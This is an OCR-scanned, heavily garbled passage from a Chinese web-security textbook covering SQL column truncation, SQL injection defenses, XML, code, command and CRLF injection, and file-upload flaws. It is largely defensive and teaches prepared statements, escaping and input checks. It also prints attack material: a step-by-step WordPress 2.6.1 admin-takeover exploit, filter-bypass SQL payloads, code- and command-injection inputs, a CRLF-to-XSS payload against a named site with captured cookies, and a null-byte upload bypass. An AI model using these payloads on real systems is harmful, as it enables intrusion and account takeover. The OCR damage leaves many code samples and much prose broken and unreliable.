| Field | Type | Null | Key | 
Default | Extra 

+---------- +------------- +------ +----- 
+--------- +---------------- 十 

| id | int(11) | NO | PRI 
NULL | auto increment | 

| username | varchar(10) | YES | 

NULL | | 

| password | varchar(10) | YES | 

NULL | | 

*-- t * T 
+--------- +---------------- 十 


3 rows in set (0.00 sec) 

mysql» insert into 

truncated test('username', 'password' ) 
values("admin","pass"); 

Query OK, 1 row affected (0.03 sec) 
mysql» select * from truncated test; 


+----+---------- +---------- 十 
| id | username | password | 
+----+---------- +---------- 十 
|i admin | pass 

+----+---------- +---------- 十 


1 row in set (0.00 sec) 

mysql» insert into 

truncated test('username', 'password') 
values("admin x", 

"new pass"); 

ERROR 1406 (22001): Data too long for 
column 'username' at row 1 

mysql» select * from truncated test; 


+----+---------- +---------- 十 
| id | username | password | 
+----+---------- +---------- 十 
| 1 | admin | pass 

+----+---------- +---------- 十 


1 row in set (0.00 sec) 


当 关 闭 了 strict 先 项 时 : 


sql- 
mode="NO_AUTO_CREATE_USER, NO_ENGINE_SUBSTITUT 
ION" 


数据 库 只 返回 一 个 warmning 信 息 ， 但 数据 插入 成 功 。 


mysql» select * from truncated test; 


+----+---------- +---------- 十 
| id | username | password | 
+----+---------- +---------- 十 
| 1 | admin | pass 

+----+---------- +---------- 十 


1 row in set (0.00 sec) 
mysql» insert into 
truncated test('username', 'password') 
values("admin x" 
-» "new pass"); 
Query OK, 1 row affected, 1 warning (0.01 


sec) 

mysql» select * from truncated test; 
+----+------------ +---------- 十 

| id | username | password | 
+----+------------ +---------- 十 

| 1 | admin | pass 

| 2 | admin | new pass | 
+----+------------ +---------- 十 

2 rows in set (0.00 sec) 

mysql> 


PERU ARS AN PAL SE FU BU ARGIS UH TE A Je RE? 根据 不 同业 务 可 能 会 
造成 不 同 的 逻辑 问题 。 比 如 类 似 下 面 的 代码 : 


$userdata = null; 
if (isPasswordCorrect($username, $password) ) 


{ 


$userdata = getUserDataByLogin($username) ; 


它 使 用 这 条 SQL 语句 来 长 证 用 记名 和 密码 : 


SELECT username FROM users WHERE username 
= ? AND passhash = ? 


但 如 末 攻 击 首 插入 一 个 同名 的 数据 ， 则 可 以 通过 此 认证 。 在 之 后 的 授 
权 过 程 中 ， 如 琳 系 统 仅仅 通过 用 户 名 来 进行 授权 : 


则 可 能 会 造成 一 些 越权 访问 。 

在 这 个 问题 公布 后 不 久 ，WordPress 就 出现 了 一 个 真实 的 案例 一 一 
注册 一 个 用 户 名 为 “admin (55 个 空格 ) x” 的 用 户 ， 就 可 以 修改 原 管理 
员 的 密码 了 。 


Vulnerable Systems: 

* WordPress version 2.6.1 

Exploit: 

1. Go to URL: server.com/wp-login.php? 
action-register 

2. Register as: 

login: admin x (the user admin[55 space 
chars]x) 

email: your email 

Now, we have duplicated 'admin' account in 
database 

3. Go to URL: server.com/wp-login.php? 
action-lostpassword 

4. Write your email into field and submit 
this form 


5. Check your email and go to reset 
confirmation link 

6. Admin's password changed, but new 
password will be send to correct admin email 
Additional Information: 

The information has been provided by irk4z. 
The original article can be found at: 
http://irk4z.wordpress.com/ 


但 这 个 漏洞 并 未 造成 严重 的 后 采 ， 因 为 攻击 者 在 此 只 能 修改 管理 员 的 
密码 ， 而 新 密码 仍然 会 发 送 到 管理 员 的 邮箱 。 尽 管 如 此 ， 我 们 并 不 能 
忽视 “SQLColumn 因为 也 许 下 一 次 漏洞 被 利用 时 
WLI AL A FRE 


7.3 ”正确 地 防御 SQL 注入 
n 分 析 了 很 多 注入 攻击 的 技巧 ， 从 防御 的 角度 来 看 ， 要 做 的 事情 
(1) 找到 所 有 的 SQL 注入 漏洞 ; 
(2) 修补 这 些 漏洞 。 
解决 好 这 两 个 问题 ， 束 能 有 效 地 防御 SQL 注入 攻击 。 
SQL 注入 的 防御 并 不 是 一 件 简 单 的 事情 ， 开 发 者 稼 常会 走 入 一 些 误 
: 。 比 如 只 对 用 户 输入 做 一 些 escape 处 理 ， 这 是 不 够 的 。 参 考 如 下 代 


$sql = "SELECT id,name,mail,cv,blog,twitte 
FROM egister WHERE 
id= "me ql real escape string($ GET['id']); 


当 攻 击 者 构造 的 注入 代码 如 下 时 : 


http: //vuln ampte con ser . php? 
T: pe LAND. 1 o. 了 NE 有 


ra), we 5,6, io ps: 1.user,where, user=substr 
i index(cu bene ne er(),char(64),1) 


TR Tr real]_escape_string 的 作用 注入 成 功 。 这 条 语句 执行 的 结果 
1 T 


| mail | n jd blog | twitter | 


e \r 

e \n 

e NULL 

。 Control-Z 


字符 ， 在 本 例 中 SQL 注入 所 使 用 的 Payload 完 全 没有 用 到 这 几 个 


AB eS ve HE ON He ik Pe BURT LA T UET 比如 处 理 包 括 “ 空 
格 ”、“ 括 号 ”在 内 的 一 些 特 ru , DR —EsQLIR BSF, Hn 
SELECT 、INSERT 等 。 

其 实 这 种 基于 黑 名 单 的 方法 ， 部 或 多 或 少 地 存在 一 些 问 题 ， 我 们 看 看 
下 面 的 案例 。 

注入 时 不 需要 使 用 空格 的 例子 : 


SELECT/**/passwd/**/from/**/user 
SELECT(passwd)from(user) 


不 需要 括号 、 引 号 的 例子 ， 其 中 0x61646D696E 是 字符 串 admin 的 十 六 进 
制 编码 : 


SELECT passwd from users where 
user-0x61646D69 


而 在 SQL 保 留 字 中 ， 像 “HAVING”、“OR-DER BY” 等 都 可 能 出 现在 自然 
语言 中 ， 用 户 提交 的 正常 数据 可 能 也 会 有 这 些 单词 ， 从 而 造成 误杀 ， 
因此 不 能 轻易 过 滤 。 

那么 到 底 该 如 何 正 确 地 防御 SQL 注入 呢 ? 

7.3.1 ”使 用 预 编译 语句 

一 般 来 说 ， 防 御 SQL 注 入 的 最 佳 方式 ， 就 是 使 用 预 编译 语句 ， 绑 定 变 
量 。 比 如 在 Java 中 使 用 预 编 译 的 SQL 语句 : 


String custname = 
request.getParameter("customerName"); // 
This should REALLY be validated 

too 

// perform input validation to detect 
attacks 

String query - "SELECT account balance FROM 
user data WHERE user name - ? "; 
PreparedStatement pstmt = 
connection.prepareStatement( query 3 
pstmt.setString( 1, custname 

ResultSet results - pstmt. executeQuery( )s 


使 用 预 编译 的 SQL 语句 ，SQL 语 句 的 语义 不 会 发 生 改 变 。 在 SQL 语句 
中 ， 变 量 用 ?表示 ， 攻 击 者 无 法 改变 SQL 的 结构 ， 在 上 面 的 例子 中 ， 即 
使 攻击 者 插入 类 似 于 tom' or '1'='1 的 字符 串 ， 也 只 会 将 此 字符 串 当做 
username 来 查询 。 


下 面 是 在 PHP 中 绑 定 变量 的 示例 。 


$query = "INSERT INTO myCity (Name, 
CountryCode, District) VALUES (?,?,?)"; 
$stmt = $mysqli-»prepare($query); 
$stmt->bind_param("sss", $vali, $val2, 


n 
$vali - 'Stuttgart'; 

$val2 - 'DEU'; 

$val3 - 'Baden-Wuerttemberg'; 
/* Execute the statement */ 
$stmt->execute(); 


在 不 同 的 语言 中 ， 都 有 着 使 用 预 编译 语句 的 方法 。 


Java EE - use PreparedStatement() with bind 
variables 

.NET - use parameterized queries like 
SglCommand() or OleDbCommand() with bind 


variables 

parame ete erize g 3 ueries eng bindP Param()) 

deir reateQu in 
HER s (ca alle d named parameters in 

ui nate 


SQLite - use sqlite3 prepare() to create a 
statement object 


7.3.2 ”使 用 存储 过 程 

除了 使 用 预 编译 语句 外 ， 我 们 还 可 以 使 用 安全 的 存储 过 程 对 抗 SQL 注 
入 。 使 用 存储 过 程 的 效果 和 使 用 预 编 语句 译 类 似 ， 其 区 别 就 是 存储 过 
程 需要 先 将 SQL 语句 定义 在 数据 库 中 。 但 需要 注意 的 是 ， 存 储 过 程 中 
也 可 能 会 存在 注入 问题 ， 因 此 应 该 尽量 避免 在 存储 过 程 内 使 用 动态 的 
SQL 语句 。 如 果 无 法 避免 ， 则 应 该 使 用 严格 的 输入 过 滤 或 者 是 编码 函 
数 来 处 理 用 户 的 输入 数据 。 


E 面 是 一 个 在 Java 中 调用 存储 过 程 的 例 于 ， 其 中 sp_getAccountBalance 
是 预先 在 数据 库 中 定义 好 的 存储 过程， 


Str mi. RE nane 
request.ge er ("cus ame"); // 
This inb Pid BL: be validated 
try 
Ca 了 bleSta ie 
nection.prepa oe ane "(ca all 


但 是 有 的 时 候 ， 可 能 无 法 使 用 预 编译 语句 或 存储 过 程 ， 该 怎么 办 ? 这 
时 候 只 能 再 次 回 到 输入 过 滤 和 编码 等 方法 上 来 。 

7.3.3 “检查 数据 类 型 

检查 输入 数据 的 数据 类 型 ， 在 很 大 程度 上 可 以 对 抗 SQL 注 入 。 

比如 下 面 这 段 代 码 ， 就 限制 了 输入 数据 的 类 型 只 能 为 integer， 在 这 种 情 
况 下 ， 也 是 无 法 注入 成 功 的 。 


<?php 
settype($offset, reine 
$query = "SELECT id, nam odu cts. 
ORDER BY name qut 20 OFFSET K ffs Sri 
ie he fo 


usin wou uld gl 

$query - spri de ELECT id, name FROM 
pro odu cts ORDER BY name LIMIT 25 OFFSET 
%d; 


$offset); 


ALOMAR Mt E AUR th BATHE - LEI PUFA ARE, b 
须 严格 按照 邮箱 的 格式 ， 输入 时 间 、 日 期 时 ， 必 须 严 格 按 照 时 间 、 日 
期 的 格式 ， 等 等 ， 都 能 避免 用 户 数据 造成 破坏 。 但 数据 类 型 检查 并 非 
万 能 ， 如 果 需 求 就 是 需要 用 户 提 交 字 符 串 ， 比 如 一 段 短文 ， 则 需要 依 
赖 其 他 的 方法 防范 SQL 注 入 。 

73.4 ”使 用 安全 画 数 


一 般 来 说 ， 各 种 Web 语 言 都 实现 了 一 些 编码 函数 ， 可 以 帮助 对 抗 SQL 注 
入 。 但 前 文 由 举 了 一 些 编码 洲 数 被 绕 过 的 例子 ， 因 此 我 们 需要 一 个 足 
够 安全 的 编码 函数 。 幸 运 的 是 ， 数 据 库 厂商 往往 都 对 此 做 出 了 “ 指 


E" S 
I 
比如 在 MySQL 中 ， 按照 以 下 思路 编码 字符 : 
NUL (0x00) --> NO [This is a zero, not the letter 0] 
BS (0x08) - --» Nb 
TAB (0x09) --> Nt 
LF (@x0a) \n 
CR (0x0d) \r 
SUB (0x1a) NZ 
(0x22) \ 
% (0x25) N96 
(0x27) N 
N (0x5c) NN 
(0x5f) NL 


all other non- hanna characters with 
ASCII values less than 256 > \c 

where 'c' is the Sridinal non- ron E MR 
character. 


同时 ， 可 以 参考 OWASP ESAPI 中 的 实现 。 这 个 函数 由 安全 专家 编 
更 值得 信赖 。 


ESAPI.encoder().encodeForSQL( new 
OracleCodec(), queryparam ); 


在 使 用 时 : 


Codec ORACLE CODEC = new OracleCodec(); 
String query - "SELECT user m FROM 

user data WHERE user nam 

ESAPI.encoder(). encodeForsQL( ORACLE | CODEC 
, req. getParameter (" userID")) + "' and 
user_password = 


W 


ee encoder(). Serre ORACLE_ CODEC 
, req.getParameter("pwd")) + 


(CHG, MARRA SHARK, BARERNA, Web 
应 用 直接 使 用 root、dbowner 等 高 权限 账户 直接 连接 数据 库 。 如 有 果 有 多 
个 不 同 的 应 用 在 使 用 同一 个 数据 库 ， 则 也 应 该 为 每 个 应 用 分 配 不 同 的 
A eee eee) genie UNE 操作 本 


74 其 他 注入 攻击 


除了 SQL 注入 外 ， 住 Web 安 全 领域 还 不 有 其 他 的 注入 攻击 ， 这 些 注入 攻击 
都 有 相同 的 特点 ， 束 古 应 用 违 否 了 “数据 与 代码 分 离 ” 原 则 。 


7.4.1 XML 注入 


XML 是 一 种 第 用 的 标记 语言 ， 通 过 标 位 对 数据 进行 结构 化 表示 。XML 
与 HTML 都 是 SGMIL (Standard Generalized Markup Language， 标 准 通 用 
标记 语言 ) 。 

XML 与 HTML 一 样 ， 也 存在 注入 攻击 ， 甚 至 在 注入 的 方法 上 也 非常 相 
似 。 如 下 例 ，3 zo T AT QUEM DNE 


final String GUESTROLE - "guest role" 


/Vuserdata 是 准备 保存 的 XML 数据 ， 接收 了 name 和 
email 两 个 用 户 提交 的 数据 
String userdata = "<USER role= 
UESTRO CES 
«name» 
request. getParaneter(" name") 
</name><emai 
request. getParameter(" email")+ 
</email></USER> 
// 保 存 XML 数 据 


userDao.save(userdata); 


(REMAP aie eA Ra, WA UISEEBGEAXUE HB 
尸 输入 的 数据 如 下 : 


useri@a.com</email></USER><USER 
role="admin_role"><name>test</ 
name»«email»user2Qa.com 


最 终生 成 的 XML 文 件 里 被 插入 一 条 数据 : 


«?xml version- "159" encoding-' "UTF-8"2> 
<USER role="guest_role"> 
«name»useri 
</name> 
<email>useri@a.com</email> 


</USER> 

<USER role="admin_role"> 
<name>test</name> 
<email>user2@a.com 
</email> 

</USER> 


XML 注入 ， 也 需要 满足 注入 攻击 的 两 大 条 件 : 用 户 能 控制 数据 的 输 
A; 程序 拼凑 了 数据 。 在 修补 方案 上 ， 与 HIML 注 入 的 修补 方案 也 是 类 
含有 的 “语言 本 身 的 保留 字符 ”进行 转 义 即 
, A 不 


Static 
t // populate entitites 
entityToCharacterMap - new 
HashTrie<Character>(); 
entityToCharacterMap.put("1t", '«'); 
entityToCharacterMap.put("gt", '>'); 
entityToCharacterMap.put("amp", '&'); 
entityToCharacterMap.put("apos", 
"NI 


i"); 
} 


7.4.2 ”代码 注入 


entityToCharacterMap.put("quot", 


代码 注入 比较 特别 一 点 。 代 码 注入 与 命令 注入 往往 都 是 由 一 些 不 安全 
的 函数 或 着 方法 引起 的 ， 其 中 的 典型 代表 束 是 eval0。 如 下 例 : 


$myvar = "varname"; 
$x - $ GET['arg']; 
eval("\$myvar = N$x;"); 


攻击 者 可 以 通过 如 下 Payload 实 施 代码 注入 : 


存在 代码 注入 漏洞 的 地 方 ， 与 “后 1 ]” 没 有 区 别 。 
在 Java 中 也 可 以 实施 代码 注入 ， 比 如 利用 Java 的 脚本 引擎 。 


import javax.script.*; 
public class Examplei { 
public static void main(String[] args) { 
try { 
ScriptEngineManager manager - 
new ScriptEngineManager(); 
criptEngine engine - 
manager.getEngineByName("JavaScript"); 
System.out.println(args[0]); 
engine.eval("print('"+ args[0] + 
mryny, 
} catch(Exception e) { 
e.printStackTrace(); 
} 
3 


攻击 者 可 以 提交 如 下 数据 : 


hallo'); var fImport = new 
JavaImporter(java.io.File); with(fImport) 


( var - new 
File('new'); f.createNewFile(); } // 


此 外 ，JSP 的 动态 include 也 能 导致 代码 注入 。 严 格 来 说 ，PHP、JSP 的 动 
SEHR (文件 包含 漏洞 ) 导致 的 代码 执行 ， 都 可 以 算是 一 种 代码 注 


<% String pageToInclude = 
getDataFromUntrustedSource(); %> 
«jsp:include page="<%=pageToInclude %>" /> 


代码 注入 多 见于 脚本 语言 ， 有 时 候 代 码 注 入 可 以 造成 命令 注入 
(Command Injection) 。 比 如 : 


<?php 

$varerror = system('cat '.$ GET['pageid'], 
$valoretorno); 

echo $varerror; 

?> 


束 古 一 个 典型 的 命令 注 入 ， 攻 击 半 可 以 利用 system() 芳 数 执行 他 想 要 的 


vulnerable.php?pageid-loquesea;ls 


是 C 语 言 中 的 一 个 命令 注入 例子 
FRECHE ; lag e | 2 
#include <stdio.h> 
#include <unistd.h> 
int main(int argc, char **argv) { 
char cat[] = "cat "; 
char *command; 
size t commandLength; 
commandLength = strlen(cat) + 
strlen(argv[1]) * 1; 
command - (char *) malloc(commandLength); 
strncpy(command, cat, commandLength); 
strncat(command, argv[1], (commandLength - 
strlen(cat)) ); 


system() KÆ HÁTI, REDBNRSWE, Non RI LAE AC 
外 的 命令 。 正 常 执行 时 : 


$ ./catWrapper Sto oe txt 
When last we le Ft heroes 


y 分 -人 

N Te N 

注入 命令 SHT: 
catwr E 

When last we left our heroes 
y.txt 


nullpointer.c 


misnull 


trunc. writewhatwhe 


对 抗 代码 注入 > 命令 注入 时 ， 需要 禁用 eval0、system0 等 可 以 执行 命令 
的 函数 。 如 果 一 EODD AC 则 需要 对 用 户 的 输入 数据 进行 处 
理 。 此 外 ， 在 PHP/JSP 中 避免 动态 include 远 元 程 文件 ， 或 者 安全 地 处 理 
它 o 

TRO TEN TEE A TRESS) ATI RY, fn Br ER USES 2 
避免 在 开发 中 使 用 ， 可 以 在 开发 规范 中 明确 指出 哪些 函数 是 禁止 使 用 
的 。 这 些 危险 函数 一 般 在 开发 语言 的 官方 文档 中 可 以 找到 一 些 建 议 。 
7.4.3 CRLFIEA 

CRLF 实 际 上 是 两 个 字符 : CR 是 Carriage Re-turn(ASCII 13, \r), LFÆ 
Line Feed(ASCII 10,\n)。\wn 这 两 个 字符 是 用 于 表示 换行 的 ， 其 十 六 进 
制 编码 分 别 为 0x0d、0x0a。 


CRLF TÉ CH SUD [ES SCZ TALE 4) > 隔 符 。 因 此 通过 “注入 CRLE 字 符 ”， 
就 有 可 能 改变 原 有 的 语义 。 

比如 ， 在 日 志文 件 中 ， 通 过 CRLF 有 可 能 构造 出 一 条 新 的 日 志 。 下 面 这 
EHI, EER ARUP 名 写 入 日 志文 件 中 。 


def log fa ilea togi nfus 


BR 
oo 
eue 

a 


username 


Ne 
og.close() 


但 是 由 于 没有 处 理 换行 符 n” 因此 当 攻 击 者 输入 如 下 数据 时 ， 束 可 
能 插入 一 条 和 额外 的 日 志 记 了 录 。 


guest\nUser login succeeded for: admin 


日 志文 件 因为 换行 符 “\n” 的 存在 ， 会 变 为 : 


User login failed for: guest 
User login succeeded for: admin 


二 条 记录 是 伪造 的 ，admin 用 户 并 不 兽 登 录 失 败 
Ce 凡是 使 用 CRLEF 作 为 分 隅 符 的 地 方 都 
可 能 存在 这 种 注入 ， 比 如 “注入 HITP 头 ”。 


在 HTTP 协 议 中 ，HTTP 头 是 通过 “rn” 来 分 隔 的 。 因 此 如 果 服 务 器 端 没 
有 过 滤 “rn>”， 而 又 把 用 户 输入 的 数据 放 在 HITP 头 中 ， 则 有 可 能 导致 安 
全 隐患 。 这 种 在 HTTP 头 中 的 CRLF 注 入 ， 又 可 以 称 为 “Http Response 
Splitting” ° 


下 面 这 个 例子 就 是 通过 EATI = 改 击 。 在 参数 中 插入 
面 这 人 1 过 CRLF; XSS? 
CRLF 字 符 : 
<form id="x" 
Be ont //login.xiaonei.com/Login.do? 
email=a%0d%0a%0d%0a<script>alert(/XSS/);</s 
cript>" method="post"> 
<!-- input name="email" value="" / --> 
<input name="password" value="testtest" / 
> 
<input name="origURL" value="http%3A%2F 
%2Fwww. xiaonei.com%2FSysHome.do%0d%0a" /> 
«input name="formName" value-"" /> 
«input name="method" valuez"" /> 


<input type="submit" value="%E7%99%BB 
%E5%BD%95" /> 


提交 后 完成 了 一 次 POST 请 求 ， 抓 包 可 以 看 到 整个 过 程 


http://login.xiaonei.com/Login.do?email=a%0d 
%0a%0d%0a<script>alert(/XSS/);</script> H 
TTP/1.1 
Accept: image/gif, image/x-xbitmap, image/ 
jpeg, image/pjpeg, 
application/x-shockwave-flash, application/ 
vnd.ms-excel, application/vnd.ms-powerpoint, 
application/msword, application/x- 
silverlight, */* 
Referer: http://www.a.com/test.html 
Accept-Language: zh-cn 

Content-Type: application/x-www-form- 
urlencoded 

UA-CPU: x86 

Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 
7.0; Windows NT 5.1; .NET CLR 2.0.50727) 
Proxy-Connection: Keep-Alive 

Content-Length: 103 

Host: login.xiaonei.com 

Pragma: no-cache 

Cookie: __utmc=204579609; 
XNESSESSIONID=abcThVKoGZNy6aSjwv54r ; 
_de=axis@ph4ntom.org; 
__utma=204579609 . 2036071383 . 1229329685 .122933 
6555.1229347798.4; __utmb=204579609; 
__utmz=204579609 .1229336555.3.3.utmccn=(refer 
ral) |utmcsr=a.com|utmcct=/test.html|utmc 
md=referral; userid=246859805; 
univid=20001021; gender=1; univyear=0; 
hostid=246859805; 
xn_app_histo_246859805=2-3-4-6-7; 

mop uniq ckid-121.0.29.225 1229340478 5418907 
16; 
syshomeforreg-1; id-246859805; 
BIGipServerpool profile-2462586378.20480.0000 
; _de=a; 

BIGipServerpool profile-2462586378.20480.0000 
password-testtest&origURL-http96253A96252F 
%252Fwww. xiaonei.com%252FSysHome .do%250d%250a 
&formName-&method- 


Hi os arr [n]: 


HTTP/1.1 200 OK 

Server: Resin/3.0.21 

Vary: Accept-Encoding 

Cache-Control: no-cache 

Pragma: no-cache 

Expires: Thu, 01 Jan 1970 00:00:00 GMT 
Set-Cookie: kl=null; domain-.xiaonei.com; 
path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT 
Set-Cookie: societyguester=null; 
domain-.xiaonei.com; path=/; expires=Thu, 01- 
Dec-1994 

16:00:00 GMT 

Set-Cookie: _de=a 
<script>alert(/XSS/);</script>; 
domain=.xiaonei.com; expires=Thu, 10- 
Dec-2009 13:35:17 

GMT 

Set-Cookie: login email-null; 
domain-.xiaonei.com; path=/; expires=Thu, 01- 
Dec-1994 

16:00:00 GMT 

Content-Type: text/html;charset-UTF-8 
Connection: close 

Transfer-Encoding: chunked 

Date: Mon, 15 Dec 2008 13:35:17 GMT 

217b 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 
Transitional//EN" 

"http: //www.w3.org/TR/xhtml11/DTD/xhtml1i- 
transitional.dtd"> 

<html > 

<head> 


注意 到 服务 器 返回 时 ， 在 Set-Cookie 的 值 里 插入 了 两 次 “rm 换行 符 。 而 
Cnm ERE HTTP 3L 89 结束 ， 在 两 次 CRLF 之 后 跟着 的 是 HTTP 
Body。 攻 击 者 在 两 次 CRLF 之 后 构造 了 恶意 的 HTML 脚 本 ， 从 而 得 以 执 
行 ，XSS 攻 击 成 功 。 


w E f http: //www. a. con/ test. html 


[test est [Ft tp 38X2FX2F www. xiao | | %ET%99XBDXE5%BD%95 


将 造成 一 个 XSS 

Go y |E nttp: //login. xiaonei. con/Login. do?email=aX0d80 aN0d80a<seript alert (/'155/) ; </script> 
He) SQ) EO) KRW IAW hoo 

We SE O ntp//1ogin:xisenei. con/Login:do?enail=e.., | | 


Tindows Internet Explorer [x 


A» 


CRLEF 注 入 HTTP 头 导致 的 XSS 


Cookie 是 最 容易 被 用 户 控 制 的 地 方 ， 应 用 经 常会 将 一 些 用 户 信 息 写 
Cookie 中 ， 从 而 被 用 户 控 制 。 


但 是 HTTP Response Splitting 并 非 只 能 通过 两 次 CRLEF 注 入 到 HTTP 
Body， 有 时 候 注入 一 个 HTTP 头 ， 也 会 带 来 安全 问题 。 


PD zs 新 版 本 的 浏览 器 上 将 造成 XSS: 


Link: «http: E a.com/x 
REL:styleshe 


而 注入 : 

则 可 以 关闭 了 正 8 的 XSS Filter 功 能 。 可 以 说 HTTP Response Splitting 的 危 
害 甚至 比 XSS 还 要 大 ， 因 为 它 破坏 了 HTTP 协 议 的 完整 性 。 

对 抗 CRLE 的 方法 非常 简单 ， 只 需要 处 理 好 “>”、“%n” 这 两 个 保留 字符 即 
可 ， 尤 其 是 那些 使 用 “换行 符 ” 作 为 分 隔 符 的 应 用 。 


75 小结 

注入 攻击 是 应 用 违背 了 “数据 与 代码 分 离 原 则 ”导致 的 结果 。 它 有 两 个 

条 件 : 一 是 用 户 能 够 控制 数据 的 输入 ; 二 是 代码 拼 竣 了 用 户 输 入 的 数 

据 ， 把 数据 当做 代码 执行 了 。 

在 对 抗 注 入 攻击 时 ， 只 需要 牢记 “数据 与 代码 分 离 原 则 ”， 在 “拼凑 ”发 

生 的 地 方 进行 安全 检查 ， 残 能 避免 此 类 问题 。 

SQL 注入 是 web 安 全 中 的 一 个 重要 领域 ， 本 章 分 析 了 很 多 SQL 注入 的 

d UNE °。 除了 SQL 注 入 外 ， 本 章 还 介绍 了 一 些 其 他 的 和 常见 注 
T o 

en 通过 设计 和 实施 合理 的 安全 解 诀 方案， 注入 攻击 是 可 以 彻底 


第 8 章 ”文件 上 传 漏洞 


文件 上 传 是 互联 网 应 用 中 的 一 INL 它 征 如 何 成 为 漏洞 的 ? TE 
什么 条 件 下 会 成 为 漏洞 ?” 本 章 将 揭 开 答 


8.1 文件 上 传 漏洞 概述 

文件 上 传 漏洞 是 指 用 户 上 传 了 一 个 可 执行 的 脚本 文件 ， 并 通过 此 脚本 
文件 获得 了 执行 服务 器 端 命令 的 能 力 。 这 种 攻击 方式 是 最 为 直接 和 有 
效 的 ， 有 时候 几乎 没有 什么 技术 门槛 。 

在 互联 网 中 ， 我 们 经 彰 用 到 文件 上 传 功能 ， 比 如 上 传 一 张 目 定义 的 图 
Fr; 分 享 一 段 视 频 或 者 照片 ;论坛 发 帖 时 附带 一 个 附件 ， 在 发 送 邮件 
时 附 市 附件 ， 等 等 。 

文件 上 传 功能 本 身 是 一 个 正常 业务 需求 ， 对 于 网 站 来 说 ， 很 多 时 候 也 
确实 需要 用 户 将 文件 上 传 到 服务 器 。 所 以 “文件 上 传 ” 本 喘 没 有 问题 ， 
但 有 问题 的 是 文件 上 传 后 ， 服 务 郁 怎么 处 理 、 解 释文 件 。 如 果 服 务 丙 
的 处 理 逻 辑 做 的 不 够 安全 ， 则 会 导致 严重 的 后 果 。 

文件 上 传 后 导致 的 常见 安全 问题 一 般 有 : 


。 上 传 文件 是 Web 脚 本 语言 ， 服 务 器 的 Web 容 器 解释 并 执行 了 用 户 上 
传 的 脚本 ， 导 人 致 代码 执行 ; 

。 上 传 文件 是 Flash 的 策略 文件 crossdo-main.xml， 黑 客 用 以 控制 Flash 
oes (其 他 通过 类 似 方 式 控制 策略 文件 的 情况 类 
Ds 

E aa 


ME 
。 上 传 文件 是 钓鱼 图 片 或 为 包含 了 脚本 的 图 片 ， 在 某 些 版 本 的 浏览 
器 中 会 被 作为 脚本 执行 ， 被 用 于 钓鱼 和 欺诈 。 


除 此 之 外 ， 还 有 一 些 不 常见 的 利用 方法 ， 比 如 将 上 传 文件 作为 一 个 入 
口 ， 洲 出 服务 器 的 后 台 处 理 程序 ， 如 图 片 解 析 模 块 ， 或 者 上 传 一 个 合 
法 的 文本 文件 ， 其 内 容 包 含 了 PHP 脚 本 ， 再 通过 “本 地 文件 包含 漏洞 
(Local File Include) ”执行 此 脚本 ;等 等 。 此 类 问题 不 在 此 细 述 。 

在 大 多 数 情 况 下 ， 文 件 上 传 漏洞 一 般 都 是 指 “ 上 传 web 脚 本 能 够 被 服务 
器 解析 ”的 问题 ， 也 就 是 通常 所 说 的 webshell 的 问题 。 要 完成 这 个 攻 
击 ， 要 满足 如 下 几 个 条 件 : 

首先 ， 上 传 的 文件 能 够 被 Web 容 右 解 释 执行 。 所 以 文件 上 传 后 所 在 的 目 
录 要 是 Web 容 器 所 和 窗 盖 到 的 路 径 。 

其 次 ， 用 户 能 够 从 Web 上 访问 这 个 文件 。 如 果 文 件 上 传 了 ， 但 用 户 无 法 
通过 Web 访 问 ， 或 者 无 法 使 得 web 容 右 解释 这 个 脚本 ， 那 么 也 不 能 称 之 


为 漏洞 。 

最 后 ， 用 户 上 传 的 文件 若 被 安全 检查 、 格 式 化 、 图 片 压 缩 等 功能 改变 
了 内 容 ， 则 也 可 能 导致 攻击 不 成 功 。 

8.1.1 从 FCKEditor 文 件 上 传 漏洞 谈 起 

下 面 看 一 个 文件 上 传 漏洞 的 案例 。 

FCKEditor 是 一 款 非常 流行 的 富 文 本 编辑 器 ， 为 了 方便 用 户 ， 它 带 有 一 
个 上 传 文件 功能 ， 但 是 这 个 功能 却 出 过 许多 次 漏洞 。 

卉 都 有 对 应 的 版 本 ， 以 PHP 为 例 ， 其 
文件 上 传 功能 


http: isse xxx. com/path/FCKeditor/editor/ 
filem Mans r/browser eaae fault/browser.html?Typ 
scal JaCo ector nectors/php/connector .php 


A 


| tet ew Folder | —— E 


http:// rm, GI. con/ adnin/fckedi tor/editor/filenanager/browser/defaul /browzer. htnl?Cenzact 


FCKEditor 的 文件 上 传 界面 


用 户 打开 这 个 页 面 ， 就 可 以 使 用 此 功能 将 任意 文件 上 传 到 服务 器 。 文 
件 上 传 后 ， 会 保存 在 /User-Files/all/ 目 录 下 。 

人 是 通过 检查 文件 的 后 组 来 确定 是 否 安全 的 。 代 
马 如 下 : 


这 上 段 代码 是 以 黑 名 单 的 方式 限制 上 传 文件 的 类 型 。 黑 名 单 与 日 名 单 的 
Ha, 我 们 在 第 1 章 中 就 有 过 论述 ， 黑 名单 是 一 种 非常 不 好 的 设计 思 
Dik? BABA, WRT ERA php2 » php4 » inc ` pwml ` 
asa、cer 等 的 文件 ， 都 可 能 导致 发 生 安全 问题 。 

由 于 FCKEditor 一 般 是 作为 第 三 方 应 用 集成 到 网 站 中 的 ， 因 此 文件 上 传 
的 目录 一 般 默认 都 会 被 Web 容 器 所 解析 ， 很 容易 形成 文件 上 传 漏洞 。 很 
多 开发 者 在 使 用 FCKEditor 时 ， 可 能 都 不 知道 它 存在 一 个 文件 上 传 功 
能 ， 如 果 不 是 特别 需要 ， 建 议 删 除 FCKEditor 的 文件 上 传代 码 ， 一 般 情 
况 下 也 用 不 到 它 。 

8.1.2” 绕 过 文件 上 传 检查 功能 

在 针对 上 传 文 件 的 检查 中 ， 很 多 应 用 都 是 通过 判断 文件 名 后 缀 的 方法 
来 验证 文件 的 安全 性 的 。 但 是 在 某 些 时 候 ， 如 果 攻 击 者 手动 修改 了 上 
传 过 程 的 POST 包 ， 在 文件 名 后 添加 一 个 %00 字 广 ， 则 可 以 截断 某 些 函 
数 对 文件 名 的 判断 。 因 为 在 许多 语言 的 男 数 中 ， 比 如 在 C、PHP 等 语言 
的 常用 字符 串 处 理 函 数 中 ，0x00 被 认为 是 终止 符 。 受 此 影响 的 环境 有 
Web 应 用 和 一 些 服 务 右 。 比 如 应 用 原本 只 允许 上 传 JPG 图 片 ， 那 么 可 以 
构造 文件 名 (需要 修改 POST 包 ) 为 xxx.php[\0].JPG， 其 中 [\0] 为 十 六 进 
